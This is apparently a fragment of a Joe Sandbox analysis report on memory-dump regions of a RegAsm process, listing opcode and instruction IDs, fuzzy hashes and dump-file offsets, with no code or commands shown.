                                                                                          • Opcode ID: c6692d686b1235c70587a8f3e38360efee74d6ddec0f226d20b6fc98994279d1
                                                                                          • Instruction ID: 71ac00ac62323afd3cd38d05280af9ea9362c001fe99b528991cfc2cfca7d9fe
                                                                                          • Opcode Fuzzy Hash: c6692d686b1235c70587a8f3e38360efee74d6ddec0f226d20b6fc98994279d1
                                                                                          • Instruction Fuzzy Hash: 6D1104763016129FD7255A2EC46492EBBA6FFC5799308007DEA06CB374CF31DC028B90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3262c9834b37227f08baa30eba198c5478a4c7c32cc331b763a375b5067df8d7
                                                                                          • Instruction ID: 530e48a513384c6eec9b2a5c09798566200968f6d6c691cb787be115299860cb
                                                                                          • Opcode Fuzzy Hash: 3262c9834b37227f08baa30eba198c5478a4c7c32cc331b763a375b5067df8d7
                                                                                          • Instruction Fuzzy Hash: 6B21EFB4D0420ACFCB10EFA9D8545EEBFF5BB4A204F10416AD915B2224EB305A89CBA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f5dc82966740af732b5407878b52c2d78004621e8034149ed7f9f88b2eea1338
                                                                                          • Instruction ID: f4337a273f133e4b34485970e2e6269871846805d68cbd5dc9376d4fc9bf35d8
                                                                                          • Opcode Fuzzy Hash: f5dc82966740af732b5407878b52c2d78004621e8034149ed7f9f88b2eea1338
                                                                                          • Instruction Fuzzy Hash: 86111C70D00209DFDB14EFA9D580B9EBFF6FB84705F10C5A9C518AB254EB745E058B81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018486123.00000000013AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013AD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13ad000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 83ca38e06ce5374078cbde1a7e0fc264fd270972ca1f75496724ff4700fc488e
                                                                                          • Instruction ID: d36f8d09459cd8986b734d9a4777e72d95add09bba2d1392e1eee48e813fe9d4
                                                                                          • Opcode Fuzzy Hash: 83ca38e06ce5374078cbde1a7e0fc264fd270972ca1f75496724ff4700fc488e
                                                                                          • Instruction Fuzzy Hash: B811DD75504284CFCB12CF54C9C4B15BFA2FB84318F28CAADE8494BA52C33AD44ACF62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 702cdca9767588f722df96c8e92d45b8c9baaab799cca7f7decd85cf409071bf
                                                                                          • Instruction ID: 853cdb3127cb318f9fb85c88557278cf22c8f2e9f4eebcbbe5626593429af616
                                                                                          • Opcode Fuzzy Hash: 702cdca9767588f722df96c8e92d45b8c9baaab799cca7f7decd85cf409071bf
                                                                                          • Instruction Fuzzy Hash: E701F7327001196BCB119E5D9810BEF3BABFBD8650F19C02AFA15D7758DE35CC129790
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a2e3449f1b0c4696512284d6a5547b8831022cc632305704e39d94a05b11d1fb
                                                                                          • Instruction ID: 7f316353312c4d4a05e74f86c3421e37f99829a0c002b04db8c5245db1fac3f6
                                                                                          • Opcode Fuzzy Hash: a2e3449f1b0c4696512284d6a5547b8831022cc632305704e39d94a05b11d1fb
                                                                                          • Instruction Fuzzy Hash: DCF096313106144BDB265A6ED454B2ABAEEEFC8A59359407DEB0DC7375EE21CC038790
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: be6482c4dcb690f088dee13162140e40aed54b24fda53003ef36f476c96d145d
                                                                                          • Instruction ID: 2046664ba77417aa778168e571d283b7e4c10b9dc57ed4e573ef6c3344dbd280
                                                                                          • Opcode Fuzzy Hash: be6482c4dcb690f088dee13162140e40aed54b24fda53003ef36f476c96d145d
                                                                                          • Instruction Fuzzy Hash: A8011374E0020AEFDB00CFA8D844AAEBBB5FB89301F408469D914A3350D7395E56CF90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ff946abc5daaef4a37677b7fa860147c7ea63879a81447fc9881f11b2f172fbd
                                                                                          • Instruction ID: a670d6b7f0f8f3495594d9c043f5a9771298792955940e3a840efec2ae7fc0d4
                                                                                          • Opcode Fuzzy Hash: ff946abc5daaef4a37677b7fa860147c7ea63879a81447fc9881f11b2f172fbd
                                                                                          • Instruction Fuzzy Hash: 8BE02631E54366CACB01E7F09C040FEBB34ADC2122B08469BC062370A0EB302219C3A2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7cd3d3f6d5f182ac9c60e241103460b16357eab618f103361a3b8e22587041cf
                                                                                          • Instruction ID: 95853cd4a34060b04074003491279439ef00b1d81410583e0b290ca678964f17
                                                                                          • Opcode Fuzzy Hash: 7cd3d3f6d5f182ac9c60e241103460b16357eab618f103361a3b8e22587041cf
                                                                                          • Instruction Fuzzy Hash: 15D05B31D2022B97CB10E7A5DC044EFF738EED5262B504626D51537140FB712659C6E1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fa89aab409d0e0db0068e1df125c1700926d2b321b6eade91ff7c782ed2533f4
                                                                                          • Instruction ID: bf2bd883fc9d13ccefc57ff3926abf2d19f743123cdd4a558752c0ab719b3699
                                                                                          • Opcode Fuzzy Hash: fa89aab409d0e0db0068e1df125c1700926d2b321b6eade91ff7c782ed2533f4
                                                                                          • Instruction Fuzzy Hash: D4D05E3220030657DB01FB79EC057993B6AFBD0916F44893090445AA69DF795C804661
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4bd92f92b346f8478af13172e7b4f9143a8808c3f0858c147f46a9bad345b3a3
                                                                                          • Instruction ID: 097a183c7997c4820722ba7c098e286a5f176bd714709bddb8b681a570cbbdd3
                                                                                          • Opcode Fuzzy Hash: 4bd92f92b346f8478af13172e7b4f9143a8808c3f0858c147f46a9bad345b3a3
                                                                                          • Instruction Fuzzy Hash: F6D04235E0514DCBCB30DFA8E4884DCBBB1FB89225B24542ADA29A3651D63454558F11
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9039941f0839d72268107e11ccf08ef2ac12d797938f508da42ca60a5e00d543
                                                                                          • Instruction ID: caf3f957f661f5606894f7d381db26d20d06b1b86f9d4651d06e78486bb8e21d
                                                                                          • Opcode Fuzzy Hash: 9039941f0839d72268107e11ccf08ef2ac12d797938f508da42ca60a5e00d543
                                                                                          • Instruction Fuzzy Hash: 84D0673AB00008AFCB149F98EC409DDF7B6FB98221B448116E915A3264C6319965DB50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: efc3df270b0fa9dbc6245e8f4d355ba76843032bf3cc3311800d4d65dbd4f1ad
                                                                                          • Instruction ID: 1daf5e0f88f9a88359f81c3719e68864d1f8fcde6c42a7c09297728d43290f1e
                                                                                          • Opcode Fuzzy Hash: efc3df270b0fa9dbc6245e8f4d355ba76843032bf3cc3311800d4d65dbd4f1ad
                                                                                          • Instruction Fuzzy Hash: 6CC012310003095BDA11FB76EC44555377EF6D0916B40893090051957DDF7D5C454791
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cee361e4a26a43f61631b7b0cbfb0c60b0711d67d573b18a3372b818424cd596
                                                                                          • Instruction ID: 76da2f47073a79eab6f23df603939370c75689d5bd6f864678db413cee171b98
                                                                                          • Opcode Fuzzy Hash: cee361e4a26a43f61631b7b0cbfb0c60b0711d67d573b18a3372b818424cd596
                                                                                          • Instruction Fuzzy Hash: 77C1B175E00218CFEB14DFA9C984B9DBBB6BF89304F1080A9D909AB365DB355E85CF50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7fb055ab5d8cc034f4d2ec97ec64b12616c31517996802eb48ea33b1334060e6
                                                                                          • Instruction ID: c259c78a90ffcdbab320ab433dc11434791fa8e0ca6108746b3768f176146d34
                                                                                          • Opcode Fuzzy Hash: 7fb055ab5d8cc034f4d2ec97ec64b12616c31517996802eb48ea33b1334060e6
                                                                                          • Instruction Fuzzy Hash: 3CC1A075E00218CFEB14DFA9C944B9DBBB6BF89304F1080A9D809AB365DB359E85CF50